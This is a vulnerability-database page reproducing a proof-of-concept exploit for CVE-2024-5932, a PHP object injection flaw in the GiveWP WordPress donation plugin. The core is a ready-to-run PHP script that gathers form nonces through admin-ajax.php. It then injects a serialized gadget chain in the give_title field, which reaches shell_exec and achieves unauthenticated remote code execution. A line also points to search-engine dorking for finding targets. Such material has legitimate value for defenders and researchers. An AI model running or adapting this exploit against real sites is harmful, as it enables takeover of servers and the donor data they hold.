Vulners
Lucene search
📄 WordPress GiveWP Donation 3.14.1 PHP Object Injection
| Reporter | Title | Published | Views | Family All 28 |
|---|---|---|---|---|
 | WordPress GiveWP Donation / Fundraising Platform 3.14.1 Code Execution Exploit | 29 Aug 202400:00 | – | zdt |
 | Exploit for Deserialization of Untrusted Data in Givewp | 6 Jan 202619:05 | – | githubexploit |
| Exploit for Deserialization of Untrusted Data in Givewp | 25 Aug 202411:51 | – | githubexploit |
| Exploit for Deserialization of Untrusted Data in Givewp | 30 Sep 202417:33 | – | githubexploit |
| Exploit for Deserialization of Untrusted Data in Givewp | 25 Aug 202411:51 | – | githubexploit |
| Exploit for Deserialization of Untrusted Data in Givewp | 4 Nov 202519:04 | – | githubexploit |
| Exploit for Deserialization of Untrusted Data in Givewp | 21 Aug 202409:51 | – | githubexploit |
 | CVE-2024-5932 | 20 Aug 202404:34 | – | circl |
 | WordPress plugin GiveWP 安全漏洞 | 20 Aug 202400:00 | – | cnnvd |
 | CVE-2024-5932 | 20 Aug 202402:03 | – | cve |
10
=============================================================================================================================================
| # Title : GiveWP Donation 3.14.1 PHP Object Injection vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 136.0.0 (64 bits) |
| # Vendor : https://givewp.com |
=============================================================================================================================================
POC :
[+] Dorking İn Google Or Other Search Enggine.
[+] Code Description: This PHP script demonstrates a proof-of-concept exploit for a PHP Object Injection vulnerability in the WordPress plugin GiveWP.
What the script does:
Sends AJAX requests to the WordPress admin-ajax.php endpoint using cURL.
Enumerates donation forms by calling the give_form_search action.
Selects a random form and retrieves its required nonce/hash via give_donation_form_nonce.
Builds a malicious serialized PHP payload that abuses unsafe object deserialization chains within GiveWP and its dependencies.
Injects the payload into a donation request parameter (give_title).
Triggers deserialization during donation processing (give_process_donation), aiming to execute a system command (e.g., whoami) via a gadget chain that reaches shell_exec.
Outputs the server response, which may contain command execution results if the target is vulnerable.
Impact:
Successful exploitation can lead to remote code execution (RCE) on the vulnerable WordPress server.
The attack requires no authentication if the affected AJAX actions are exposed.
(Related : https://packetstorm.news/files/id/180463/ Related CVE numbers: CVE-2024-5932 ) .
[+] Payload :
[+] Set Target : line 17
[+] Usage : php poc.php
[+] PayLoad :
<?php
// استغلال ثغرة PHP Object Injection في إضافة GiveWP لووردبريس
function send_request($url, $data) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
curl_setopt($ch, CURLOPT_HTTPHEADER, ['Content-Type: application/x-www-form-urlencoded']);
$response = curl_exec($ch);
curl_close($ch);
return $response;
}
$target = "http://victim-site.com"; // استبدل بعنوان الموقع المستهدف
// الحصول على قائمة النماذج
$form_list = send_request("$target/wp-admin/admin-ajax.php", "action=give_form_search");
$form_list = json_decode($form_list, true);
if (empty($form_list)) {
die("فشل في جلب قائمة النماذج.");
}
// اختيار نموذج عشوائي
$selected_form = $form_list[array_rand($form_list)];
$form_id = $selected_form['id'];
// جلب بيانات الاستغلال
$form_data = send_request("$target/wp-admin/admin-ajax.php", "action=give_donation_form_nonce&give_form_id=$form_id");
$form_data = json_decode($form_data, true);
if (!isset($form_data['data'])) {
die("فشل في جلب بيانات النموذج.");
}
$form_hash = $form_data['data'];
// تحميل الحمولة (Payload)
$payload = 'O:19:"Stripe\\StripeObject":1:{s:10:"\0*\0_values";a:1:{s:3:"foo";' .
'O:62:"Give\\PaymentGateways\\DataTransferObjects\\GiveInsertPaymentData":1:{' .
's:8:"userInfo";a:1:{s:7:"address";O:4:"Give":1:{s:12:"\0*\0container";' .
'O:33:"Give\\Vendors\\Faker\\ValidGenerator":3:{s:12:"\0*\0validator";' .
's:10:"shell_exec";s:12:"\0*\0generator";' .
'O:34:"Give\\Onboarding\\SettingsRepository":1:{' .
's:11:"\0*\0settings";a:1:{s:8:"address1";s:'.strlen('whoami').':"whoami";}}' .
's:13:"\0*\0maxRetries";i:10;}}}}}}';
// تنفيذ الاستغلال
$data = http_build_query([
'give-form-id' => $form_id,
'give-form-hash' => $form_hash,
'give-price-id' => '0',
'give-amount' => '$10.00',
'give_first' => 'John',
'give_last' => 'Doe',
'give_email' => '[email protected]',
'give_title' => $payload,
'give-gateway' => 'offline',
'action' => 'give_process_donation'
]);
$response = send_request("$target/wp-admin/admin-ajax.php", $data);
echo "Response: \n$response\n";
?>
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
17 Dec 2025 00:00Current
7.6High risk
Vulners AI Score7.6
CVSS 3.19.8 - 10
EPSS0.94173
SSVC